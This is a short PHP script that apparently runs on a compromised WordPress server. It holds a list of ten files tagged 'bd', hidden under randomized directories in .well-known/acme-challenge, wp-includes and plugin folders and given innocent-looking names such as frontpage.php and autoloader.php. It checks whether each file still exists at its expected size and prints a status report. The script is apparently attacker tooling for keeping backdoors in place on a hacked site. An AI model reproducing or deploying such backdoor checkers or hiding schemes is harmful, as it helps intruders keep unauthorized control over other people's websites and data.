<?php $r = '/home/authyupq/public_html'; $x = ["/well-known/acme-challenge/b/h/g/h/t1nkrvo/jdzgtim/frontpage.php"=>"bd@@380442@@607",
"/well-known/acme-challenge/b/d/a/d/bzycqox/zacg1mt/addcss.php"=>"bd@@468765@@702",
"/well-known/acme-challenge/c/f/e/c/bftqe1n/bfsvaip/eAccelerator.php"=>"bd@@380460@@650",
"/wp-includes/html-api/vzy1daf/dulvtpa/qptl1wz/index.php"=>"bd@@330035@@36799",
"/wp-content/plugins/pro-elements/modules/forms/submissions/data/responses/query.failed.response.php"=>"bd@@468793@@990",
"/wp-content/uploads/woocommerce_uploads/autoloader.php"=>"bd@@331090@@7379",
"/wp-content/plugins/pro-elements/modules/custom-code/import-export/import.runner.php"=>"bd@@404853@@899",
"/well-known/acme-challenge/a/h/b/h/usnqfzw/jvsalxe/editDuties.php"=>"bd@@339595@@990",
"/wp-includes/html-api/vzy1daf/dulvtpa/qptl1wz/vars.php"=>"bd@@332185@@646",
"/well-known/acme-challenge/b/h/b/e/garqbmj/xcbpdfn/phpthumb.unsharp.php"=>"bd@@383404@@543"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');